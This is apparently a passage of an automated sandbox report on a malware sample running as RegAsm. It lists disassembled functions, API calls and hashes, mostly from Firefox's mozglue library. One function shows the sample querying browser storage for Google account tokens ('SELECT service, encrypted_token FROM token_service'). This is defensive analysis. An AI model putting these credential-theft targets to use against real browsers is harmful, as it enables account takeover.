                                                                                                                                                                                                                                                                                                  • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                                                                                                  • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                                                                                                  • API String ID: 1980384892-344433685
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1bda5ead5e3546e47a3211d511f4cae4c7c103064c1e86e50c99d1680adae32a
                                                                                                                                                                                                                                                                                                  • Instruction ID: c0c9fd5bce23105c16e954ae967b9da540c35ebcf17d9a01a590f1f0a98e862b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bda5ead5e3546e47a3211d511f4cae4c7c103064c1e86e50c99d1680adae32a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6051F471D053088FEB10DF68DA896EEB7B5AF49318F04883DE86167B40E7306949C7E2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C86A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C86A565
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C86A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C86A4BE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C86A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C86A4D6
                                                                                                                                                                                                                                                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C86A65B
                                                                                                                                                                                                                                                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C86A6B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                                                                                                                                                  • String ID: 0$z
                                                                                                                                                                                                                                                                                                  • API String ID: 310210123-2584888582
                                                                                                                                                                                                                                                                                                  • Opcode ID: aa37bc8b255caab48e78f9ef7f31c3e32f125b3b994d50aba7a6a47bbfddb0a7
                                                                                                                                                                                                                                                                                                  • Instruction ID: e8ea6c8ea1907018d1bc7febe2e05272be7de6dc5ffad61b8ecd978f57b15f33
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa37bc8b255caab48e78f9ef7f31c3e32f125b3b994d50aba7a6a47bbfddb0a7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A4158719087499FC351CF29C580A8FBBE4BF89344F408A2EF49987750EB30D949CB82
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00408DC0 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 337stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: memcmp.MSVCRT ref: 0040714B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: memset.MSVCRT ref: 00407179
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: LocalAlloc.KERNEL32(00000040,?), ref: 004071B0
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00409015
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040903B
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00409124
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00409138
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                                                                                  • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                                                                  • API String ID: 2910778473-1713091031
                                                                                                                                                                                                                                                                                                  • Opcode ID: 500e07bd11b97dcf6f28d48f575acb2971e5d5bcd12fae14b5701074da479ef7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 94835c60b8661c71cc78b5a216063b7e60eb4f21c63f22e0e3312ed9cf878cdd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 500e07bd11b97dcf6f28d48f575acb2971e5d5bcd12fae14b5701074da479ef7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55D19E30801248EACB14EBA4D955BEEBBB9AF19304F5441BEF506732D2DB786B0CC765
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C839420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C83947D
                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C839459
                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C83946B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                                                                                                  • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                                                                                                  • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                                                                                                  • Opcode ID: 98a78bd905fd798e0151342bc583586cced74e7e9dff3cd46fca7a08010ffbd8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1a2b98cb1328874e2cf5112d36d6c87a57bdf5c01f478ad6c625bfc2d2d37d48
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98a78bd905fd798e0151342bc583586cced74e7e9dff3cd46fca7a08010ffbd8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D601B570A001218BD7309B9DDB1DA8F32B5AB0636CF041D36D90EC7B51FA25D4A4CAFA
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C7FB630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(?,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB6AC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB6D1
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB6E3
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB70B
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB71D
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C7FB61E), ref: 6C7FB73F
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB760
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB79A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1394714614-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: aa8430161d562eb432bed975f78f03465110d61cba52a6873ef8c9fdf016a26e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2a19d410cf91e6236015f928aff0fdf3f9e1dc669dc0cb44c672e4dcdee9e1ab
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa8430161d562eb432bed975f78f03465110d61cba52a6873ef8c9fdf016a26e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5241A1B2D001159FCB14DE7CDE806AEB7B5BB94324F250A3AE825E7781E731A90587E1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C86B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C86B5B9
                                                                                                                                                                                                                                                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C86B5C5
                                                                                                                                                                                                                                                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C86B5DA
                                                                                                                                                                                                                                                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C86B5F4
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C86B605
                                                                                                                                                                                                                                                                                                  • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C86B61F
                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6C86B631
                                                                                                                                                                                                                                                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C86B655
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1276798925-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 946488dee3ef46443eaa8538e69c0e5b4a22fc16acbaf56160339ba8bff4941e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9479c402246228f3e8938a1585a868ad910c2b565304babb19452fd65cc7f545
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 946488dee3ef46443eaa8538e69c0e5b4a22fc16acbaf56160339ba8bff4941e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C317471B00114CBCB31DB6ACA5C5BE7BB5FF86329B140935E91697740EB34A806CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C80B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C84CC83,?,?,?,?,?,?,?,?,?,6C84BCAE,?,?,6C83DC2C), ref: 6C80B7E6
                                                                                                                                                                                                                                                                                                  • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C84CC83,?,?,?,?,?,?,?,?,?,6C84BCAE,?,?,6C83DC2C), ref: 6C80B80C
                                                                                                                                                                                                                                                                                                  • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C84CC83,?,?,?,?,?,?,?,?,?,6C84BCAE), ref: 6C80B88E
                                                                                                                                                                                                                                                                                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C84CC83,?,?,?,?,?,?,?,?,?,6C84BCAE,?,?,6C83DC2C), ref: 6C80B896
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 922945588-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 45c5912f8d3a277ea9c1e02f8095885843204ac7530303f5cf7bf4056b0e33b3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 175d784dfefc3417d2c542d9bc34e69cfec7893a6ad386ce669e6432facb1332
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45c5912f8d3a277ea9c1e02f8095885843204ac7530303f5cf7bf4056b0e33b3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1517C357006148FCB25CF59CA88A3ABBF5FF89318F698959E99687751C730EC01CB80
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C841D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C841D0F
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,6C841BE3,?,?,6C841D96,00000000), ref: 6C841D18
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,6C841BE3,?,?,6C841D96,00000000), ref: 6C841D4C
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C841DB7
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C841DC0
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C841DDA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C841EF0: GetCurrentThreadId.KERNEL32 ref: 6C841F03
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C841EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C841DF2,00000000,00000000), ref: 6C841F0C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C841EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C841F20
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C841DF4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1880959753-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 570f1b1c8fe89c62f029484c9424a38ce1149eaf6b9a7124051373aee850d5bf
                                                                                                                                                                                                                                                                                                  • Instruction ID: 199e68a50ee0e7201f9fcb62d9f7a09b75a5872c711eaba06fd2776614d91ec8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 570f1b1c8fe89c62f029484c9424a38ce1149eaf6b9a7124051373aee850d5bf
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46415CB52017049FCB20DF29C588B6ABBF5FF49318F10882DE95A87B41DB71E854CBA1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8384E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8384F3
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83850A
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83851E
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83855B
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83856F
                                                                                                                                                                                                                                                                                                  • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8385AC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C837670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C8385B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83767F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C837670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C8385B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C837693
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C837670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C8385B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8376A7
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8385B2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C815EDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: memset.VCRUNTIME140(6C857765,000000E5,55CCCCCC), ref: 6C815F27
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: LeaveCriticalSection.KERNEL32(?), ref: 6C815FB2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
